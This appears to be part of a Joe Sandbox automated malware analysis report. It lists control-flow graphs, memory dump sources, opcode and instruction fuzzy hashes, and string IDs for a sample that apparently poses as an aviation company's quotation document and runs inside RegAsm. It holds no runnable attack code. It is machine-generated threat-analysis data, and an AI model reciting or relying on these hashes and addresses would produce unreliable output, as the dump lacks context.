                                                                                          execution_graph 15826 7ffb4ad80c81 15827 7ffb4ad80c8f 15826->15827 15828 7ffb4ad80f2a FreeConsole 15827->15828 15830 7ffb4ad80e7d 15827->15830 15829 7ffb4ad80f5e 15828->15829 15831 7ffb4ad804ea 15832 7ffb4ad80ee0 FreeConsole 15831->15832 15834 7ffb4ad80f5e 15832->15834
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: )J$)J
                                                                                          • API String ID: 0-3559553940
                                                                                          • Opcode ID: 57c50d94d99db58339e9e93c361c72e5f582612398c949c2f94875063b4a4a09
                                                                                          • Instruction ID: c7b5b8868f69387685b693f356beb09551e71bd92c3f22f15d0b46b4e4e52315
                                                                                          • Opcode Fuzzy Hash: 57c50d94d99db58339e9e93c361c72e5f582612398c949c2f94875063b4a4a09
                                                                                          • Instruction Fuzzy Hash: B6B2227060CB854FD759EF28C4814B5B7E2FF95301B2446BEE49AC7296DE38E846CB81
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: XBJ$XBJ
                                                                                          • API String ID: 0-881064399
                                                                                          • Opcode ID: 50eec0c1c0a9bbf59fa24b882889a9a6903642ece109d531343b4f78884e922a
                                                                                          • Instruction ID: d8eedd9db06bac46c76c0a55b12570413cc970c584e3a2a188f6f0bafddb0c31
                                                                                          • Opcode Fuzzy Hash: 50eec0c1c0a9bbf59fa24b882889a9a6903642ece109d531343b4f78884e922a
                                                                                          • Instruction Fuzzy Hash: 1AA292B1A0DA498FEB98EF28D495AB877F5FF55310F2401F9D04EC7292DA28AC41CB41

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1030 7ffb4ad82630-7ffb4ad84141 call 7ffb4ad84000 1037 7ffb4ad84164-7ffb4ad84173 1030->1037 1038 7ffb4ad84175-7ffb4ad8418f call 7ffb4ad84000 call 7ffb4ad84050 1037->1038 1039 7ffb4ad84143-7ffb4ad84159 call 7ffb4ad84000 call 7ffb4ad84050 1037->1039 1048 7ffb4ad84190-7ffb4ad841e0 1039->1048 1049 7ffb4ad8415b-7ffb4ad84162 1039->1049 1053 7ffb4ad841e2-7ffb4ad841e7 call 7ffb4ad82830 1048->1053 1054 7ffb4ad841ec-7ffb4ad84223 1048->1054 1049->1037 1053->1054 1057 7ffb4ad8441f-7ffb4ad84470 1054->1057 1058 7ffb4ad84229-7ffb4ad84234 1054->1058 1082 7ffb4ad84472-7ffb4ad84489 1057->1082 1083 7ffb4ad844bf-7ffb4ad844d0 1057->1083 1059 7ffb4ad842a8-7ffb4ad842ad 1058->1059 1060 7ffb4ad84236-7ffb4ad84244 1058->1060 1062 7ffb4ad84320-7ffb4ad8432a 1059->1062 1063 7ffb4ad842af-7ffb4ad842bb 1059->1063 1060->1057 1061 7ffb4ad8424a-7ffb4ad84259 1060->1061 1067 7ffb4ad8428d-7ffb4ad84298 1061->1067 1068 7ffb4ad8425b-7ffb4ad8428b 1061->1068 1065 7ffb4ad8434c-7ffb4ad84354 1062->1065 1066 7ffb4ad8432c-7ffb4ad84339 call 7ffb4ad82850 1062->1066 1063->1057 1069 7ffb4ad842c1-7ffb4ad842d4 1063->1069 1070 7ffb4ad84357-7ffb4ad84362 1065->1070 1085 7ffb4ad8433e-7ffb4ad8434a 1066->1085 1067->1057 1072 7ffb4ad8429e-7ffb4ad842a6 1067->1072 1068->1067 1075 7ffb4ad842d9-7ffb4ad842dc 1068->1075 1069->1070 1070->1057 1076 7ffb4ad84368-7ffb4ad84378 1070->1076 1072->1059 1072->1060 1079 7ffb4ad842f2-7ffb4ad842fa 1075->1079 1080 7ffb4ad842de-7ffb4ad842ee 1075->1080 1076->1057 1081 7ffb4ad8437e-7ffb4ad8438b 1076->1081 1079->1057 1086 7ffb4ad84300-7ffb4ad8431f 1079->1086 1080->1079 1081->1057 1084 7ffb4ad84391-7ffb4ad843b1 1081->1084 1090 7ffb4ad8448b-7ffb4ad84491 1082->1090 1091 7ffb4ad844a6-7ffb4ad844bd 1082->1091 1084->1057 1093 7ffb4ad843b3-7ffb4ad843c2 1084->1093 1085->1065 1094 7ffb4ad844d1-7ffb4ad84516 1090->1094 1095 7ffb4ad84493-7ffb4ad844a4 1090->1095 1091->1083 1097 7ffb4ad8440d-7ffb4ad8441e 1093->1097 1098 7ffb4ad843c4-7ffb4ad843cf 1093->1098 1105 7ffb4ad84518-7ffb4ad84525 1094->1105 1106 7ffb4ad84565-7ffb4ad84571 1094->1106 1095->1090 1095->1091 1098->1097 1102 7ffb4ad843d1-7ffb4ad84408 call 7ffb4ad82850 1098->1102 1102->1097 1108 7ffb4ad84539-7ffb4ad84547 1105->1108 1109 7ffb4ad84527-7ffb4ad84537 1105->1109 1115 7ffb4ad845c8-7ffb4ad845cf 1106->1115 1116 7ffb4ad84573-7ffb4ad84579 1106->1116 1113 7ffb4ad84549-7ffb4ad84563 1108->1113 1114 7ffb4ad84596-7ffb4ad845ad 1108->1114 1109->1108 1109->1109 1113->1106 1120 7ffb4ad845af-7ffb4ad845be 1114->1120 1118 7ffb4ad84612-7ffb4ad8463b 1115->1118 1119 7ffb4ad845d1-7ffb4ad845d2 1115->1119 1116->1115 1121 7ffb4ad8457b-7ffb4ad8457c 1116->1121 1124 7ffb4ad845d5-7ffb4ad845d8 1119->1124 1123 7ffb4ad845c1-7ffb4ad845c6 1120->1123 1125 7ffb4ad8457f-7ffb4ad84582 1121->1125 1123->1115 1123->1125 1126 7ffb4ad8463c-7ffb4ad84651 1124->1126 1127 7ffb4ad845da-7ffb4ad845eb 1124->1127 1125->1126 1129 7ffb4ad84588-7ffb4ad84595 1125->1129 1136 7ffb4ad8465b-7ffb4ad8466a 1126->1136 1137 7ffb4ad84653-7ffb4ad8465a 1126->1137 1130 7ffb4ad845ed-7ffb4ad845f3 1127->1130 1131 7ffb4ad84609-7ffb4ad84610 1127->1131 1129->1123 1132 7ffb4ad84597-7ffb4ad845ad 1129->1132 1130->1126 1133 7ffb4ad845f5-7ffb4ad84605 1130->1133 1131->1118 1131->1124 1132->1120 1133->1131 1138 7ffb4ad8466c-7ffb4ad8466d 1136->1138 1139 7ffb4ad846b6-7ffb4ad846e1 1136->1139 1137->1136 1140 7ffb4ad8466f-7ffb4ad846b1 1138->1140 1141 7ffb4ad8466e 1138->1141 1140->1139 1141->1140
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HoJ$d
                                                                                          • API String ID: 0-3187922457
                                                                                          • Opcode ID: f77b93de92609eacdfea9649446e2ed6c513120d7a518a74d9489a29234a5324
                                                                                          • Instruction ID: 3feb758f29d5a2ea3cada3077ddcab723f2bd3703dee8c556789256fa92ba261
                                                                                          • Opcode Fuzzy Hash: f77b93de92609eacdfea9649446e2ed6c513120d7a518a74d9489a29234a5324
                                                                                          • Instruction Fuzzy Hash: 2E2234B1A1DA494FEB59EE3CD4825B1B7E4EF55310B2402FED4AAC7197DD28E8438780
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673716540.00007FFB4AE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ae50000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: A
                                                                                          • API String ID: 0-3554254475
                                                                                          • Opcode ID: 1585787b537c4a10568b28b18431536d9dc449a7492188b92ed1f555f22279ca
                                                                                          • Instruction ID: 34cd58785ff0344cfa27e1b0d053722951a9c7683decdb4077f28627ee850f4c
                                                                                          • Opcode Fuzzy Hash: 1585787b537c4a10568b28b18431536d9dc449a7492188b92ed1f555f22279ca
                                                                                          • Instruction Fuzzy Hash: 2BB244B280D6864FE756FFB8D9555A47FE0FF55300F2801FEE099CB196DA28A806C781

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: fish$hKJ
                                                                                          • API String ID: 0-1128198123
                                                                                          • Opcode ID: d2b06780895377ce22c546902d515e10d5bbe8249ce5eb6004e35261037b1ca7
                                                                                          • Instruction ID: 3ee92fc8730a00f663face0ecef10a557ee4cfdcfe3446bbe504040704a68802
                                                                                          • Opcode Fuzzy Hash: d2b06780895377ce22c546902d515e10d5bbe8249ce5eb6004e35261037b1ca7
                                                                                          • Instruction Fuzzy Hash: 53D1277171DA4A4FEB5DBE3CD8555F5B3E0EF96210B1442BEE49FC3292DD28A8028781
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `}J
                                                                                          • API String ID: 0-1057495743
                                                                                          • Opcode ID: c8b146285a7f4814215989bd789fe331a7bcfaa472a7570e69ab44e77d42568d
                                                                                          • Instruction ID: 497d1b766afcd3cb133dc770384bae81b182af8f68372a9f986b07479fcb8e58
                                                                                          • Opcode Fuzzy Hash: c8b146285a7f4814215989bd789fe331a7bcfaa472a7570e69ab44e77d42568d
                                                                                          • Instruction Fuzzy Hash: 5BB24A7061CB868FE709EF38C4955A5BBE1FF95300B2445FED49AC72A6DA38A846C740

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2089 7ffb4ad9407a-7ffb4ad9409b 2092 7ffb4ad94126-7ffb4ad941ac call 7ffb4ad86520 2089->2092 2093 7ffb4ad940a1-7ffb4ad940e0 2089->2093 2100 7ffb4ad941b1-7ffb4ad941b8 2092->2100 2093->2092 2101 7ffb4ad940e2-7ffb4ad940fb 2093->2101 2102 7ffb4ad941bd-7ffb4ad941eb 2100->2102 2107 7ffb4ad94019-7ffb4ad94039 2101->2107 2103 7ffb4ad94b23-7ffb4ad94b33 2102->2103 2104 7ffb4ad941f1-7ffb4ad942bd 2102->2104 2104->2102 2108 7ffb4ad94116-7ffb4ad94125 2107->2108 2109 7ffb4ad9403f-7ffb4ad9406a 2107->2109 2111 7ffb4ad94073 2109->2111 2112 7ffb4ad9406c-7ffb4ad94071 2109->2112 2113 7ffb4ad94078 2111->2113 2112->2113 2113->2107
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: J$J
                                                                                          • API String ID: 0-806982098
                                                                                          • Opcode ID: da882ebf11de7ebaaf1e2483197735776f1879dedfbb662387422c636f76d563
                                                                                          • Instruction ID: f177ea8b88f19f6e7aca8ab74a6446e44dad7373f63873795b0ea0cd4e2d0c3e
                                                                                          • Opcode Fuzzy Hash: da882ebf11de7ebaaf1e2483197735776f1879dedfbb662387422c636f76d563
                                                                                          • Instruction Fuzzy Hash: F2516C71A0D7890FD71E9E38C8521B57BE9DB86320F1582BFD48AC72D7DD28A8478391
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: J
                                                                                          • API String ID: 0-2383599987
                                                                                          • Opcode ID: cf3403a02c475e9a772ac680dc74642d9e9ac225533e0ea391f092d88488ddb9
                                                                                          • Instruction ID: 3df19221e7e7f4554f4ca6c4610fccadeb72e9380ebcc2f6c5960bbd47bd27c2
                                                                                          • Opcode Fuzzy Hash: cf3403a02c475e9a772ac680dc74642d9e9ac225533e0ea391f092d88488ddb9
                                                                                          • Instruction Fuzzy Hash: 18513B62B0D6950FD31EAE7C9C951E17FA9DB8B31071982FFD486CB2E7D8259C068381
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5f0d4b73d1144d74dc9c179f99b61233d19bb02c5efeecd3b3581f5c48fc8bbc
                                                                                          • Instruction ID: bf6e94a3c08c835c20e87290151e17b27381b236c63b80b855018f2388f0d6c2
                                                                                          • Opcode Fuzzy Hash: 5f0d4b73d1144d74dc9c179f99b61233d19bb02c5efeecd3b3581f5c48fc8bbc
                                                                                          • Instruction Fuzzy Hash: 1252D570B0CA098FDB68EF2CD455A79B7E5EF55301F2401BDE49EC7292DE28AC468781
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: abca9fbfb28ca9ac3ed1329a5152ac2d5dde0e0ccd415d32812a5d084f529fa1
                                                                                          • Instruction ID: c1f5514e069b8861062e73ab33325169e2d90a6b6101a66cb7623ce68885fe8f
                                                                                          • Opcode Fuzzy Hash: abca9fbfb28ca9ac3ed1329a5152ac2d5dde0e0ccd415d32812a5d084f529fa1
                                                                                          • Instruction Fuzzy Hash: BBC15671A0CB854FE71DDF38C4921B5B7E2FF95301B2446BED4D6C72A2DA28A806C781

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0fcadca37e0bb9c1f9bc294bb54312e52b1fcc51665e220b4fa5bdbadfbc30b5
                                                                                          • Instruction ID: 2fce6c896258b1e1ee9ad51479a59d20ce38a2ca278572a16f1b0178f7a04b4c
                                                                                          • Opcode Fuzzy Hash: 0fcadca37e0bb9c1f9bc294bb54312e52b1fcc51665e220b4fa5bdbadfbc30b5
                                                                                          • Instruction Fuzzy Hash: 62A1B171B1DA084FEB58EB3CD45A2B9B7D5EF99310F1041BEE05EC3292CD28AC418761

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2286 7ffb4ad804ea-7ffb4ad80f22 2289 7ffb4ad80f2a-7ffb4ad80f5c FreeConsole 2286->2289 2290 7ffb4ad80f5e 2289->2290 2291 7ffb4ad80f64-7ffb4ad80f8b 2289->2291 2290->2291
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleFree
                                                                                          • String ID:
                                                                                          • API String ID: 771614528-0
                                                                                          • Opcode ID: adc2d22de902041514d1246713d840d87e22f8577af618245fcef1afb9751d3f
                                                                                          • Instruction ID: 518fcab042198bd74f7b5d7847e1ba4fba46eae3908f6eb4b2f9f2106cddaed4
                                                                                          • Opcode Fuzzy Hash: adc2d22de902041514d1246713d840d87e22f8577af618245fcef1afb9751d3f
                                                                                          • Instruction Fuzzy Hash: E7217171908A0C8FEB28EF99D84ABFABBE4EB55321F00416ED04AD3551DB74A44ACB51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673716540.00007FFB4AE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ae50000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 75107f4f0f3b6693db162e79f6fb0b8f5c213592795dd90b2c9f2f3ca9d55fe2
                                                                                          • Instruction ID: bfcbde095e26542ba2ac9bffa108af353c37e6192a25ca2143657937b1c90c18
                                                                                          • Opcode Fuzzy Hash: 75107f4f0f3b6693db162e79f6fb0b8f5c213592795dd90b2c9f2f3ca9d55fe2
                                                                                          • Instruction Fuzzy Hash: D451E67190CA898FEB55FF68D9519A87BE0FF55304F3405FDE05ACB18BDA24A846C740
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673716540.00007FFB4AE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ae50000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: af728eecd09e3d9f2946fb6b41ec6317ccf6cf2789f49af93094c82afe9fea8d
                                                                                          • Instruction ID: 60cc8472e3a0fd8fa0994c9a71f8f718b7c0d696a4542b7aa9a1b3c2f3639ca7
                                                                                          • Opcode Fuzzy Hash: af728eecd09e3d9f2946fb6b41ec6317ccf6cf2789f49af93094c82afe9fea8d
                                                                                          • Instruction Fuzzy Hash: A74188B290DB894FEB46FF68D8554A83BE0FF55308F2400FED05ACB196DA26A800C381
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9429535d5dbdb5923e497bd2e7f71a0eda861bf447e5c465237e6f665f76a4ea
                                                                                          • Instruction ID: f1b510fccc15482784ee866e460251e986e9502d6105224d1d9c2071154177e8
                                                                                          • Opcode Fuzzy Hash: 9429535d5dbdb5923e497bd2e7f71a0eda861bf447e5c465237e6f665f76a4ea
                                                                                          • Instruction Fuzzy Hash: 7431686260D00D1FD31CAD3DCD8A8B77B5EDB8332072582BEE4D6C71A2EC54B8174290
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dfad21e4ef251e2ad3092e6c3fab96ed32ff95bf08607688dd9b9a1e03b2707c
                                                                                          • Instruction ID: 5bcde5805d55310f239fcce77148ee31f1ee37b1e385a80e1cf03c6eb2e01974
                                                                                          • Opcode Fuzzy Hash: dfad21e4ef251e2ad3092e6c3fab96ed32ff95bf08607688dd9b9a1e03b2707c
                                                                                          • Instruction Fuzzy Hash: 73828C35A00209DFDB15CFA8C984AAEBBF6FF88314F158569EA099B361D730ED45CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 010b2ee5082b353c4373ee3c75adf1f891ce5b86903eaf42292e00386e8fcf5c
                                                                                          • Instruction ID: dd8e268a3f44bde27cf18247435fd3ef9872e09041f7407c3b83e02b17644063
                                                                                          • Opcode Fuzzy Hash: 010b2ee5082b353c4373ee3c75adf1f891ce5b86903eaf42292e00386e8fcf5c
                                                                                          • Instruction Fuzzy Hash: 3D52E232D04757CBCBB5CF38C8D629BBFB1BF41224B58846DD88686606E734AC11DB96
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b240610f5978264f782debde6952795d14f0b0ee595eb5e1566222c108f64820
                                                                                          • Instruction ID: 5ca2187046c9530d3bf4218651d3dc455387932b0a95cfcc3a7926c7d5d4daa4
                                                                                          • Opcode Fuzzy Hash: b240610f5978264f782debde6952795d14f0b0ee595eb5e1566222c108f64820
                                                                                          • Instruction Fuzzy Hash: F6126DB0A002199FDB14DF69C854BAEBBB6FF88704F108529E906DB3A5DB319D41CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b980ab3d1e6a6c054bf8c4179e851aaf64aa0dd81b69fa630363317074a5b932
                                                                                          • Instruction ID: ed33ccf8bbcb4c842a032424b45f937befc8ee510edbadf9a321da981e7c0bfd
                                                                                          • Opcode Fuzzy Hash: b980ab3d1e6a6c054bf8c4179e851aaf64aa0dd81b69fa630363317074a5b932
                                                                                          • Instruction Fuzzy Hash: 03F11B70A10219DFDB55CF69C888AADBBB6FF88318F55806AEA05EB361D734DC41CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9ac8abb7cce8882f917f2c3dc0459bfea6653dae9fc90eb452c315b4cb2a6dd6
                                                                                          • Instruction ID: 8ea623ae8a3ff95cc2a2e703a31ce0d3fb7721cdf4b3f3704ba88694e09ad478
                                                                                          • Opcode Fuzzy Hash: 9ac8abb7cce8882f917f2c3dc0459bfea6653dae9fc90eb452c315b4cb2a6dd6
                                                                                          • Instruction Fuzzy Hash: 2CA1E775E00218DFDB18DFAAD884A9DBBF2FF89304F14906AD509AB361DB349941CF50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6526398d252f442289b9b119c6eb10ffa0e1a5c1fbb80b3f03573e5a980e33f4
                                                                                          • Instruction ID: 1b1e3bea80a793568af20af268d532cc05ea4164f41ee6de647ecc5d02609507
                                                                                          • Opcode Fuzzy Hash: 6526398d252f442289b9b119c6eb10ffa0e1a5c1fbb80b3f03573e5a980e33f4
                                                                                          • Instruction Fuzzy Hash: F591E474E00218CFEB18CFA9D884A9DBBF2FF88315F1580A9D509AB365DB349945CF50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 961ef0ee014d68d2e3fce7ae2b0734cd19064c097125787ab3de182d8ebc31d0
                                                                                          • Instruction ID: 3dd18ca29707efe18f97ec7e3102338fc1e46ecd9e9ed49a0894678425a9879c
                                                                                          • Opcode Fuzzy Hash: 961ef0ee014d68d2e3fce7ae2b0734cd19064c097125787ab3de182d8ebc31d0
                                                                                          • Instruction Fuzzy Hash: C581C374E04218CFEB18DFAAD884A9DBBF2BF88314F14D06AD519AB365DB349941CF50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 16bf42552164a75c0eaf582603984229a448d13c633fafc2c63df33815bc418a
                                                                                          • Instruction ID: 6b43e6022e746c4eb5baee97c9486825d46caf053f614b9c177df582813db75c
                                                                                          • Opcode Fuzzy Hash: 16bf42552164a75c0eaf582603984229a448d13c633fafc2c63df33815bc418a
                                                                                          • Instruction Fuzzy Hash: B981A074E00218CFEB18DFAAD884A9DBBF2BF88304F149069E519AB365DB309945CF50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 62f78d50b86cfee5e47c29b07127e70621adc9b2cd3653e26aa0a679af3bfef9
                                                                                          • Instruction ID: e199866c9f4be055b80e9c5bffd13ddf427e1a0f63c13740e36ce5d7335cdb96
                                                                                          • Opcode Fuzzy Hash: 62f78d50b86cfee5e47c29b07127e70621adc9b2cd3653e26aa0a679af3bfef9
